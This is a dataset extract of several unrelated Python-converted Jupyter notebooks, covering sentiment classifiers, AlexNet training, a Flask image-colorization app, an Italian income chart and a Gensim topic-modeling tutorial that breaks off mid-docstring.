code
stringlengths
38
801k
repo_path
stringlengths
6
263
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: PythonData # language: python # name: pythondata # --- # + # Dependencies and Setup import requests import gmaps # Import API key from config import g_key # + # Set the parameters to search for a hotel in Paris. params = { "radius": 5000, "types": "lodging", "key": g_key, "location": "48.8566, 2.3522"} # Use base URL to search for hotels in Paris. base_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json" # Make request and get the JSON data from the search. hotels = requests.get(base_url, params=params).json() hotels
Cleanup/Google_Nearby_Search.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from keras.preprocessing import sequence from keras.preprocessing import text from keras.preprocessing.text import Tokenizer from nltk.stem import PorterStemmer import numpy as np from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding, LSTM from keras.preprocessing import text from sklearn.model_selection import train_test_split from tensorflow.keras.callbacks import TensorBoard from nltk.tokenize import word_tokenize import os import pandas as pd import string from bs4 import BeautifulSoup import re import random from keras.layers import Dropout import os df = pd.read_csv(r'C:\Users\Alexis\Documents\Data_Scraping\data\{}.csv'.format("twitter_sentiment_1"), encoding="Latin-1") df['target'] = df["target"].replace(4, 1) # replace labels of 4 with 1, easier for the computer to compute df.drop(["ids"," flag"," user"],axis=1,inplace=True) # drop unneeded columns updated_stopwords = ['i', 'me', 'my', 'myself', 'we', "weve", "wev", 'our', 'ours', 'ourselves', 'you', "you're", "you've", "you'll", "you'd", 'your', 'yours', 'yourself', 'yourselves', 'he', 'him', 'his', 'himself', 'she', "she's", 'her', 'hers', 'herself', 'it', "it's", 'its', 'itself', 'they', 'them', 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this', 'that', "that'll", 'these', 'those', 'am', 'is', 'are', 'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does', 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', 'at', 'by', 'for','with', 'about', 'against', 'between', 'into', 'through', 'during', 'before', 'after', 'above','below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further', 'then', 
'once', 'here', 'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'only', 'own', 'same', 'so', 'than', 'too', 's', 't', 'can', 'will', 'just', 'should', "should've", 'now', 'd','ll', 'm', 'o', 're', 've', 'y', 'ma', "youre", "youve", "youll", "youd", "shes", "its", "thatll", "hes", "im", "x", "well", "wel", "w", "i'm", "u", "b", "theyre", "they're", "ms", "mrs", "mr", "s"] # + def cleaning(data): porter = PorterStemmer() text_df = data[" text"] cleaned_tweets_list = [] for text in text_df: html_decoded = BeautifulSoup(text, "lxml")# html decoding html_decoded = html_decoded.get_text() # gets the text from the decoded html try: html_decoded = html_decoded.decode("utf-8-sig") # decoded using utf-8-sig no_utf = html_decoded.replace(u"\ufffd", " ") # removes UTF-8 BOM except: no_utf = html_decoded no_utf = no_utf.encode('utf8').decode('utf8') string_no_tags = re.sub(r"@[A-Za-z0-9-_]+"," ", no_utf) # removes tags no_urls = re.sub(r"http\S+", " ", string_no_tags) # remove urls no_numbers = re.sub(r"\d+", " ", no_urls) # remove numbers no_hashtags = re.sub(r"#[A-Za-z0-9]+"," ",no_numbers) # removes hashtags and anything following it no_hashtags = [word.lower() for word in no_hashtags.split()] removed_stopwords = [word for word in no_hashtags if word not in updated_stopwords] stem = "" for words in removed_stopwords: stem += "{} ".format(porter.stem(words)) duplicates_deleted = re.sub('\s+', ' ', stem).strip() # all spaces are converted to a single spac # removes duplicate characters duplicates_deleted = "" check = "" counter = 0 for word in removed_stopwords: for character in word: counter += 1 if character != check: check = character duplicates_deleted += "{}".format(character) else: continue if len(word) == counter: duplicates_deleted += "{}".format(" ") counter = 0 check = "" duplicates_deleted = duplicates_deleted.replace(".", " ") no_punctuation = "".join([char.lower() for char in 
duplicates_deleted if char not in string.punctuation]) tweets = no_punctuation.lower() # turn everything lowercase single_spaced = re.sub('\s+', ' ', no_punctuation).strip() single_spaced = single_spaced.split(" ") second_removed_stopwords = [word for word in single_spaced if word not in updated_stopwords] cleaned_tweets = "" for words in second_removed_stopwords: cleaned_tweets += "{} ".format(porter.stem(words)) cleaned_tweets_list.append(cleaned_tweets) # add each list to tweet dict_cleaned = {"text": cleaned_tweets_list} # create dictionary for dataframe structure cleaned_dataframe = pd.DataFrame(dict_cleaned) # creates the dataframe return cleaned_dataframe cleaned_df = cleaning(df) # + def combine(cleaned_df, old_df): targetList = [] dateList = [] textList = [] for f in old_df[" date"]: dateList.append(f) for f in old_df["target"]: targetList.append(f) for f in cleaned_df["text"]: textList.append(f) merged_df = pd.DataFrame({"date": dateList, "target": targetList,"text": textList}) return merged_df merged_df = combine(cleaned_df, df) # - for index, row in merged_df.iterrows(): if row["text"] == "": merged_df.drop(index, inplace=True) elif row["text"] == " ": merged_df.drop(index, inplace=True) elif row["text"] == " ": merged_df.drop(index, inplace=True) if "�" in row["text"]: merged_df.drop(index, inplace=True) elif "à" in row["text"]: merged_df.drop(index, inplace=True) elif "¥" in row["text"]: merged_df.drop(index, inplace=True) elif "ð" in row["text"]: merged_df.drop(index, inplace=True) elif "ñ" in row["text"]: merged_df.drop(index, inplace=True) elif "è" in row["text"]: merged_df.drop(index, inplace=True) elif "å" in row["text"]: merged_df.drop(index, inplace=True) elif "ç" in row["text"]: merged_df.drop(index, inplace=True) elif "â" in row["text"]: merged_df.drop(index, inplace=True) elif "º¥" in row["text"]: merged_df.drop(index, inplace=True) elif "ë" in row["text"]: merged_df.drop(index, inplace=True) elif "í" in row["text"]: merged_df.drop(index, 
inplace=True) elif "£" in row["text"]: merged_df.drop(index, inplace=True) elif "ø" in row["text"]: merged_df.drop(index, inplace=True) elif "§" in row["text"]: merged_df.drop(index, inplace=True) elif "ù" in row["text"]: merged_df.drop(index, inplace=True) elif "ã" in row["text"]: merged_df.drop(index, inplace=True) # + merged_df.to_csv("updated_merged_df_100.csv") merged_df = pd.read_csv("updated_merged_df_100.csv") # + # find the amount of distinct words found in the dataset full_text = [] for row in merged_df["text"]: row = row.split() full_text += row distinct_words = list(dict.fromkeys(full_text)) print("Found " + str(len(distinct_words)) + " unique words") # + X = merged_df["text"] y = merged_df["target"] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=4) tokenizer = Tokenizer(num_words=len(distinct_words)) tokenizer.fit_on_texts(X) word_index = tokenizer.word_index X_train = tokenizer.texts_to_sequences(X_train) X_test = tokenizer.texts_to_sequences(X_test) # + X_train = np.array(X_train) X_test = np.array(X_test) y_train = np.array(y_train) y_test = np.array(y_test) X_train = sequence.pad_sequences(X_train, maxlen=280) X_test = sequence.pad_sequences(X_test, maxlen=280) # + max_features = len(distinct_words) # unique vocab maxlen = 280 # the number of words per data point embedding_size = 32 # the dimensions that each word is converted to #tensorboard name = "LSTM 3 layers" tboard_log_dir = os.path.join("logs", name) tensorboard = TensorBoard(log_dir = tboard_log_dir) model = Sequential() model.add(Embedding(max_features, embedding_size, input_length=maxlen)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3, return_sequences=True)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3, return_sequences=True)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3)) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) fitModel = 
model.fit(X_train, y_train, epochs = 30, batch_size = 126, validation_data=(X_test, y_test), verbose=1, callbacks=[tensorboard]) print(model.summary())
Sentiment Analysis LSTM.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import requests import xml.etree.ElementTree as ET # The URL https://www.w3schools.com/xml/simple.xml links to a restaurant menu in XML format # # - Using `requests` fetch the data to the notebook # - Parse the XML data using element tree # - How many food items are there? # - What is the price of `Strawberry Belgian Waffles`? # - List the names of food items with less than 700 calories
27-problem-begin_apis_xml_xpath_xquery.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import tensorflow as tf from flask import Flask, render_template, request,url_for,redirect from werkzeug.utils import secure_filename from tensorflow.keras.models import Sequential,load_model from tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img from skimage.color import rgb2lab, lab2rgb, rgb2gray, xyz2lab from skimage.io import imsave import numpy as np import os import random from tensorflow.keras.layers import Conv2D, UpSampling2D, InputLayer, Conv2DTranspose from tensorflow.keras.layers import Activation, Dense, Dropout, Flatten # + import time app = Flask(__name__) @app.route('/') def main(): return render_template('index.html') @app.route('/uploader', methods = ['GET', 'POST']) def upload_file(): f = request.files['pic'] print(f.filename) f.save(secure_filename(f.filename)) model = Sequential() model.add(InputLayer(input_shape=(None, None, 1))) model.add(Conv2D(8, (3, 3), activation='relu', padding='same', strides=2)) model.add(Conv2D(8, (3, 3), activation='relu', padding='same')) model.add(Conv2D(16, (3, 3), activation='relu', padding='same')) model.add(Conv2D(16, (3, 3), activation='relu', padding='same', strides=2)) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(Conv2D(32, (3, 3), activation='relu', padding='same', strides=2)) model.add(UpSampling2D((2, 2))) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(UpSampling2D((2, 2))) model.add(Conv2D(16, (3, 3), activation='relu', padding='same')) model.add(UpSampling2D((2, 2))) model.add(Conv2D(2, (3, 3), activation='tanh', padding='same')) model.compile(optimizer='rmsprop',loss='mse') #model = load_model('Grey2colormodel.h5') path = secure_filename(f.filename) image = 
img_to_array(load_img(path, target_size=(400, 400))) image = np.array(image, dtype=float) X = rgb2lab(1.0/255*image)[:,:,0] Y = rgb2lab(1.0/255*image)[:,:,1:] Y /= 128 X = X.reshape(1, 400, 400, 1) Y = Y.reshape(1, 400, 400, 2) model.fit(x=X, y=Y,batch_size=1,epochs=0) model.load_weights('Grey2colormodel.h5') print(model.evaluate(X, Y, batch_size=1)) output = model.predict(X) output *= 128 # Output colorizations cur = np.zeros((400, 400, 3)) cur[:,:,0] = X[0][:,:,0] cur[:,:,1:] = output[0] base="static//" out_result_path="img_result"+str(time.time())+".png" out_grey_path="img_gray_version"+str(time.time())+".png" imsave(base+out_result_path, lab2rgb(cur)) imsave(base+out_grey_path, rgb2gray(lab2rgb(cur))) return render_template('output.html',p1=base+out_grey_path,p2=base+out_result_path) if __name__ == '__main__': app.run() # - # !pwd
Grey2colorPythonServer.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # RNN Sentiment Classifier # In this notebook, we use an RNN to classify IMDB movie reviews by their sentiment. # #### Load dependencies import tensorflow from tensorflow.keras.datasets import imdb from tensorflow.keras.preprocessing.sequence import pad_sequences from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Dropout, Embedding, SpatialDropout1D from tensorflow.keras.layers import SimpleRNN # new! from tensorflow.keras.callbacks import ModelCheckpoint import os from sklearn.metrics import roc_auc_score import matplotlib.pyplot as plt # #### Set hyperparameters # + # output directory name: output_dir = 'model_output/rnn' # training: epochs = 16 # way more! batch_size = 128 # vector-space embedding: n_dim = 64 n_unique_words = 10000 max_review_length = 100 # lowered due to vanishing gradient over time pad_type = trunc_type = 'pre' drop_embed = 0.2 # RNN layer architecture: n_rnn = 256 drop_rnn = 0.2 # dense layer architecture: # n_dense = 256 # dropout = 0.2 # - # #### Load data (x_train, y_train), (x_valid, y_valid) = imdb.load_data(num_words=n_unique_words) # removed n_words_to_skip # #### Preprocess data x_train = pad_sequences(x_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) x_valid = pad_sequences(x_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) # #### Design neural network architecture # + model = Sequential() # first hidden layer model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length)) model.add(SpatialDropout1D(drop_embed)) # Second hidden layer model.add(SimpleRNN(n_rnn, dropout=drop_rnn)) # model.add(Dense(n_dense, activation='relu')) # typically don't see top dense layer in NLP like in # 
model.add(Dropout(dropout)) model.add(Dense(1, activation='sigmoid')) # - model.summary() # #### Configure model model.compile(loss='binary_crossentropy', optimizer='nadam', metrics=['accuracy']) modelcheckpoint = ModelCheckpoint(filepath=output_dir+"/weights.{epoch:02d}.hdf5") if not os.path.exists(output_dir): os.makedirs(output_dir) # #### Train! model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_valid, y_valid), callbacks=[modelcheckpoint]) # #### Evaluate model.load_weights(output_dir+"/weights.16.hdf5") y_hat = model.predict_proba(x_valid) plt.hist(y_hat) _ = plt.axvline(x=0.5, color='orange') "{:0.2f}".format(roc_auc_score(y_valid, y_hat)*100.0)
notebooks/rnn_sentiment_classifier.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] heading_collapsed=true # ## BoilerPlate command # + [markdown] hidden=true # It’s standard practice to start the notebook with the following three lines; they ensure that any edits to libraries you make are reloaded here automatically, and also that any charts or images displayed are shown in this notebook. # # # + hidden=true # %reload_ext autoreload # %autoreload 2 # %matplotlib inline # + [markdown] heading_collapsed=true # ## Importing Fast AI library # + [markdown] hidden=true # Let’s import fastai library and define our batch_size parameter to 128. Usually, image databases are enormous, so we need to feed these images into a GPU using batches, batch size 128 means that we will feed 128 images at once to update parameters of our deep learning model. If you are running out of memory because of smaller GPU RAM, you can reduce batch size to 64 or 32. # + hidden=true from fastai.vision import * from alexnet import * bs=128 # + [markdown] heading_collapsed=true # ## Downloading Dataset # + [markdown] hidden=true # Install Kaggle CLI and then use the following commdan to download Cats vs dog data - # + hidden=true # #!kaggle competitions download -c dogs-vs-cats # + [markdown] hidden=true # Extract the train zip folder in cats_dog folder. # + hidden=true path = Path('../data/cats_dog/') # + [markdown] heading_collapsed=true # ## Importing Data # + [markdown] hidden=true # Getting File names from the path # + hidden=true fnames = get_image_files(path) # + [markdown] hidden=true # Using ImageDataBunch API from fastAI to create our Dataset Loader. Note that we are taking classes from file names and extracting it with Regex functions. Also splitting the data in 80-20 ratio for out of sample validation. 
# + hidden=true data = ImageDataBunch.from_name_re(path, fnames, pat=r'([^/]+)\.\d+.jpg$', ds_tfms=get_transforms(), valid_pct=0.2, size=227, bs=bs ).normalize() # + [markdown] hidden=true # Looking at training(20,000 images) and validation dataset(5,000) images # + hidden=true data.train_ds # + hidden=true data.valid_ds # + [markdown] hidden=true # Looking at labels, number of labels and some sample images # + hidden=true print(data.classes) ## Prints class labels print(data.c) ## Prints number of classes data.show_batch(rows=4, figsize=(10,6), hide_axis=False) ## Show sample data # + [markdown] heading_collapsed=true # ## About the model # + [markdown] hidden=true # AlexNet famously won the 2012 ImageNet LSVRC-2012 competition by a large margin (15.3% VS 26.2% (second place) error rates). Here we have a look at the details of the neuron architecture from the related paper *ImageNet Classification with Deep Convolutional Neural Networks.* - # # | Layer Type | Output size | Filter Size / Stride | # |-------------|-------------|------------------------| # | Input Image | 227*227*3 | | # | CONV | 55*55*96 | 11*11/4*4*, K=96 | # | ACT | 55*55*96 | | # | BN | 55*55*96 | | # | POOL | 27*27*96 | 3*3/2*2 | # | DO | 27*27*96 | 0.25 | # | CONV | 27*27*256 | 5*5, K=256 | # | ACT | 27*27*256 | | # | BN | 27*27*256 | | # | POOL | 13*13*256 | 3*3/2*2 | # | DO | 13*13*256 | 0.25 | # | CONV | 13*13*384 | 3*3, K=384 | # | ACT | 13*13*384 | | # | BN | 13*13*384 | | # | CONV | 13*13*384 | 3*3, K=384 | # | ACT | 13*13*384 | | # | BN | 13*13*384 | | # | CONV | 13*13*256 | 3*3, K=256 | # | ACT | 13*13*256 | | # | BN | 13*13*256 | | # | POOL | 13*13*256 | 3*3/2*2 | # | DO | 6*6*256 | 0.25 | # | FC | 4096 | | # | ACT | 4096 | | # | BN | 4096 | | # | DO | 4096 | 0.5 | # | FC | 4096 | | # | ACT | 4096 | | # | BN | 4096 | | # | DO | 4096 | 0.5 | # | FC | 1000 | | # | SOFTMAX | 1000 | | # # Glossary- # - CONV -> Convolution layer # - ACT -> ReLU Activation # - BN -> Batch Normalization # - 
DO -> Dropout # - Pool -> Max pooling # - FC -> Fully connected layer # - # ## Training the model # We have defined our AlexNet model in alexnet.py file, now we need to train it. We can use FastAI's *Learner* function which makes it easier to leverage modern enhancement in optimization methods and many other neat tricks like 1-Cycle style training as highlighted in [<NAME>'s paper](https://arxiv.org/pdf/1803.09820.pdf) for faster convergence. Let's define our Learner class - ## Defining the learner alexnet_learner = Learner(data=data, model=ALEXNet(n_class=data.c), loss_func=nn.CrossEntropyLoss(), metrics=accuracy) alexnet_learner.model ## Finidng Ideal learning late alexnet_learner.lr_find() alexnet_learner.recorder.plot() alexnet_learner.fit_one_cycle(10, 1e-3) alexnet_learner.save('alexnet_stage-1') from sklearn.metrics import classification_report interp = ClassificationInterpretation.from_learner(alexnet_learner) print(classification_report(interp.y_true,interp.pred_class)) # As we can see we are reaching 94% accuracy just by using AlexNet as compared to 50% if we have picked classes at random. interp.plot_confusion_matrix(figsize=(4,4), dpi=60) # Let's see where our model is getting tricked. interp.plot_top_losses(9, figsize=(15,11))
9_Alexnet_fastai/AlexNet using FastAI.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # Librerie import os import pandas as pd import numpy as np import folium import matplotlib.pyplot as plt plt.style.use('ggplot') get_ipython().magic('pylab inline') # Cartelle Input/Output dir_df = os.path.join(os.path.abspath(''),'stg') dir_out = os.path.join(os.path.abspath(''),'output') df_g1_filename = r'df_g1.pkl' df_g1_fullpath = os.path.join(dir_df, df_g1_filename) df_g1 = pd.read_pickle(df_g1_fullpath) df_g1 = df_g1[df_g1['Territorio']!='Italia'] df_g1.head(2) df_g1['Popolazione residente'] = df_g1['Popolazione residente']/100000 # + style.use('fivethirtyeight') import matplotlib.ticker as mtick # Report G1 tp = df_g1.plot( x='Reddito pro capite', y='Speranza di vita alla nascita', s=df_g1['Popolazione residente'], kind='scatter', xlim=(0,75000), ylim=(0,90), legend = False, figsize = (6,4)) for i, txt in enumerate(df_g1.Territorio): tp.annotate(txt, (df_g1['Reddito pro capite'].iat[i]*1.070,df_g1['Speranza di vita alla nascita'].iat[i])) tp.plot() tp.tick_params(axis = 'both', which = 'major', labelsize = 10) # Generate a bolded horizontal line at y = 0 tp.axhline(y = 0, color = 'black', linewidth = 4, alpha = 0.7) tp.axvline(x = 500, color = 'black', linewidth = 0.8, alpha = 0.7) # Remove the label of the x-axis #tp.xaxis.label.set_visible(False) #tp.yaxis.label.set_visible(False) tp.set_ylabel('Speranza di vita alla nascita (anni)',fontsize=8) tp.set_xlabel('Reddito pro capite (euro)',fontsize=8) fmt = '{x:,.0f}' tick = mtick.StrMethodFormatter(fmt) tp.xaxis.set_major_formatter(tick) text = tp.text(x = -7000, y = -17, s = 'www.ildatomancante.it Fonte: Istat', fontsize = 10, color = '#f0f0f0', backgroundcolor = 'grey') 
text.set_url('http://www.ildatomancante.it/opendata/popolazione/799/la-grande-fuga-salute-ricchezza-e-origini-della-disuguaglianza-in-italia/') # Adding a title and a subtitle Reddito e aspettativa di vita tp.text(x = 1000, y = 106, s = "Reddito e aspettativa di vita in Italia (2015)", fontsize = 14, weight = 'bold', alpha = .75) tp.text(x = 1000, y = 96, s = '''Relazione tra l'aspettativa di vita e il reddito pro capite dei cittadini \nitaliani.''', fontsize = 10, alpha = .85) fig_prj = tp.get_figure() fig_prj.savefig(os.path.join(dir_out,'G1_Reddito_e_Aspettativa.png'), format='png', dpi=300,bbox_inches='tight') fig_prj.savefig(os.path.join(dir_out,'G1_Reddito_e_Aspettativa.svg'), format='svg', dpi=300,bbox_inches='tight') # + # df_g1.to_csv(os.path.join(dir_out,r'G1_Preston.csv'),header=True, index=False)
G1_data_visualization.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Topics – Easy Topic Modeling in Python # # The text mining technique **Topic Modeling** has become a popular statistical method for clustering documents. This [Jupyter notebook](http://jupyter.org/) introduces a step-by-step workflow, basically containing data preprocessing, the actual topic modeling using **latent Dirichlet allocation** (LDA), which learns the relationships between words, topics, and documents, as well as some interactive visualizations to explore the model. # # LDA, introduced in the context of text analysis in [2003](http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf), is an instance of a more general class of models called **mixed-membership models**. Involving a number of distributions and parameters, the topic model is typically performed using [Gibbs sampling](https://en.wikipedia.org/wiki/Gibbs_sampling) with conjugate priors and is purely based on word frequencies. # # There have been written numerous introductions to topic modeling for humanists (e.g. [this one](http://scottbot.net/topic-modeling-for-humanists-a-guided-tour/)), which provide another level of detail regarding its technical and epistemic properties. # # For this workflow, you will need a corpus (a set of texts) as plain text (`.txt`) or [TEI XML](http://www.tei-c.org/index.xml) (`.xml`). Using the `dariah_topics` package, you also have the ability to process the output of [DARIAH-DKPro-Wrapper](https://github.com/DARIAH-DE/DARIAH-DKPro-Wrapper), a command-line tool for *natural language processing*. # # Topic modeling works best with very large corpora. The [TextGrid Repository](https://textgridrep.org/) is a great place to start searching for text data. 
Anyway, to demonstrate the technique, we provide one small text collection in the folder `grenzboten_sample` containing 15 diary excerpts, as well as 15 war diary excerpts, which appeared in *Die Grenzboten*, a German newspaper of the late 19th and early 20th century. # # **Of course, you can work with your own corpus in this notebook.** # # We're relying on the LDA implementation by [<NAME>](https://radimrehurek.com/), called [Gensim](https://radimrehurek.com/project/gensim/), which is attractive because of its multi-core support. Aside from that, we provide two more Jupyter notebooks: # # * [IntroducingMallet](IntroducingMallet.ipynb), using LDA by [MALLET](http://mallet.cs.umass.edu/topics.php), which is known to be very robust. # * [IntroducingLda](IntroducingLda.ipynb), using LDA by [lda](http://pythonhosted.org/lda/index.html), which is lightweight. # # For more information in general, have a look at the [documentation](http://dev.digital-humanities.de/ci/job/DARIAH-Topics/doclinks/1/). # ## First step: Installing dependencies # # To work within this Jupyter notebook, you will have to import the `dariah_topics` library. As you do, `dariah_topics` also imports a couple of external libraries, which have to be installed first. `pip` is the preferred installer program in Python. Starting with Python 3.4, it is included by default with the Python binary installers. If you are interested in `pip`, have a look at [this website](https://docs.python.org/3/installing/index.html). 
# # To install the `dariah_topics` library with all dependencies, open your commandline, go with `cd` to the folder `Topics` and run: # # ``` # pip install -r requirements.txt # ``` # # Alternatively, you can do: # # ``` # python setup.py install # ``` # # If you get any errors or are not able to install *all* dependencies properly, try [Stack Overflow](https://stackoverflow.com/questions/tagged/pip) for troubleshooting or create a new issue on our [GitHub page](https://github.com/DARIAH-DE/Topics). # # **Important**: If you are on macOS or Linux, you will have to use `pip3` and `python3`. # ### Some final words # As you probably already know, code has to be written in the grey cells. You execute a cell by clicking the **Run**-button (or **Ctrl + Enter**). If you want to run all cells of the notebook at once, click **Cell > Run All** or **Kernel > Restart & Run All** respectively, if you want to restart the Python kernel first. On the left side of an (unexecuted) cell stands `In [ ]:`. The empty bracket means, that the cell hasn't been executed yet. By clicking **Run**, a star appears in the brackets (`In [*]:`), which means the process is running. In most cases, you won't see that star, because your computer is faster than your eyes. You can execute only one cell at once, all following executions will be in the waiting line. If the process of a cell is done, a number appears in the brackets (`In [1]:`). # ## Starting with topic modeling! # # Execute the following cell to import modules from the `dariah_topics` library. from cophi_toolbox import preprocessing from dariah_topics import postprocessing from dariah_topics import visualization # Furthermore, we will need some additional functions from external libraries. from gensim.models import LdaMulticore import metadata_toolbox.utils as metadata import pandas as pd from pathlib import Path # Let's not pay heed to any warnings right now and execute the following cell. 
import warnings
warnings.filterwarnings("ignore")

# ## 1. Preprocessing

# ### 1.1. Reading a corpus of documents

# #### Defining the path to the corpus folder
#
# In the present example code, we are using the 30 diary excerpts from the folder `grenzboten`. To use your own corpus, change the path accordingly.

path_to_corpus = Path('data', 'grenzboten_sample')

# #### Specifying the pattern of filenames for metadata extraction
#
# You have the ability to extract metadata from the filenames. For instance, if your textfiles look like:
#
# ```
# goethe_1816_stella.txt
# ```
#
# the pattern would look like this:
#
# ```
# {author}_{year}_{title}
# ```
#
# So, let's try this for the example corpus.

pattern = '{author}_{year}_{title}'

# #### Accessing file paths and metadata

# We begin by creating a list of all the documents in the folder specified above. That list will tell the function `preprocessing.read_files` (see below) which text documents to read. Furthermore, based on filenames we can create some metadata, e.g. author and title.

meta = pd.concat([metadata.fname2metadata(str(path), pattern=pattern) for path in path_to_corpus.glob('*.txt')])
meta[:5] # by adding '[:5]' to the variable, only the first 5 elements will be printed

# #### Read listed documents from folder

corpus = list(preprocessing.read_files(meta.index))
corpus[0][:255] # printing the first 255 characters of the first document

# Your `corpus` contains as many elements (`documents`) as there are texts in your corpus. Each element of `corpus` is a list containing exactly one element, the text itself as one single string including all whitespace and punctuation:
#
# ```
# [['This is the content of your first document.'],
# ['This is the content of your second document.'],
# ...
# ['This is the content of your last document.']]
# ```

# ### 1.3. Tokenize corpus

# Now, your `documents` in `corpus` will be tokenized.
Tokenization is the task of cutting a stream of characters into linguistic units, simply words or, more precisely, tokens. The tokenize function `dariah_topics` provides is a simple Unicode tokenizer. Depending on the corpus, it might be useful to use an external tokenizer function, or even develop your own, since its efficiency varies with language, epoch and text type.

tokenized_corpus = [list(preprocessing.tokenize(document)) for document in corpus]

# At this point, each `document` is represented by a list of separate token strings. As above, have a look at the first document (which has the index `0` as Python starts counting at 0) and show its first 14 words/tokens (that have the indices `0:13` accordingly).

tokenized_corpus[0][0:13]

# ### 1.4. Create a document-term matrix
#
# The LDA topic model is based on a bag-of-words model of the corpus. To improve performance in large corpora, actual words and document titles are replaced by indices in the actual bag-of-words model.
#
# **Because of Gensim's API, you will have to choose the large corpus model.**

document_term_matrix, document_ids, type_ids = preprocessing.create_document_term_matrix(tokenized_corpus, meta['title'], large_corpus=True)

# ### 1.5. Feature removal
#
# *Stopwords* (also known as *most frequent tokens*) and *hapax legomena* are harmful for LDA and have to be removed from the corpus or the document-term matrix respectively. In this example, the 100 most frequent tokens will be categorized as stopwords.
#
# **Hint**: Be careful with removing most frequent tokens, you might remove tokens quite important for LDA. Anyway, to gain better results, it is highly recommended to use an external stopwords list.
#
# In this notebook, we combine the 100 most frequent tokens, hapax legomena and an external stopword list.
# #### List the 100 most frequent words

stopwords = preprocessing.list_mfw(document_term_matrix, most_frequent_tokens=100, type_ids=type_ids)

# These are the five most frequent words:

stopwords[:5]

# #### List hapax legomena

hapax_legomena = preprocessing.find_hapax_legomena(document_term_matrix, type_ids)
print("Total number of types in corpus:", len(type_ids))
print("Total number of hapax legomena:", len(hapax_legomena))

# #### Optional: Use external stopwordlist

path_to_stopwordlist = Path('data', 'stopwords', 'de.txt')
external_stopwords = [line.strip() for line in path_to_stopwordlist.open('r', encoding='utf-8')]

# #### Combine lists and remove content from `document_term_matrix`

features = stopwords + hapax_legomena + external_stopwords
document_term_matrix = preprocessing.remove_features(features, document_term_matrix=document_term_matrix, type_ids=type_ids)

# ### 1.6. Creating specific Gensim corpus format
#
# With the function below, you can create the specific Gensim corpus format.

gensim_corpus = postprocessing.doc2bow(document_term_matrix)

# ## 2. Model creation
#
# The actual topic modeling is done with external state-of-the-art LDA implementations. In this example, we are relying on the open-source toolkit **Gensim** which was used and cited in over 400 commercial and academic applications since 2008.

# ### 2.1. Rearrange dictionaries

doc2id = {value : key for key, value in document_ids.items()}
type2id = {value : key for key, value in type_ids.items()}

# ### 2.2. Generate LDA model
#
# We use the class `LdaMulticore` from the library `gensim` to generate an LDA topic model. To instantiate an `LdaMulticore` object, a couple of parameters have to be specified.
#
# But first, if you are curious about any library, module, class or function, try `help()`. This can be very useful, because (at least in a well documented library) explanations of use and parameters will be printed.
We're interested in the class `LDA` of the library `lda`, so let's try: # # ``` # help(LdaMulticore) # ``` # # This will print something like this (in fact even more): # # ``` # Help on class LdaMulticore in module gensim.models.ldamulticore: # # class LdaMulticore(gensim.models.ldamodel.LdaModel) # | The constructor estimates Latent Dirichlet Allocation model parameters based # | on a training corpus: # | # | >>> lda = LdaMulticore(corpus, num_topics=10) # | # | You can then infer topic distributions on new, unseen documents, with # | # | >>> doc_lda = lda[doc_bow] # | # | The model can be updated (trained) with new documents via # | # | >>> lda.update(other_corpus) # | # | Methods defined here: # | # | __init__(parameter ...) # | If given, start training from the iterable `corpus` straight away. If not given, # | the model is left untrained (presumably because you want to call `update()` manually). # | # | `num_topics` is the number of requested latent topics to be extracted from # | the training corpus. # | # | `id2word` is a mapping from word ids (integers) to words (strings). It is # | used to determine the vocabulary size, as well as for debugging and topic # | printing. # | # | `workers` is the number of extra processes to use for parallelization. Uses # | all available cores by default: `workers=cpu_count()-1`. **Note**: for # | hyper-threaded CPUs, `cpu_count()` returns a useless number -- set `workers` # | directly to the number of your **real** cores (not hyperthreads) minus one, # | for optimal performance. # | # | If `batch` is not set, perform online training by updating the model once # | every `workers * chunksize` documents (online 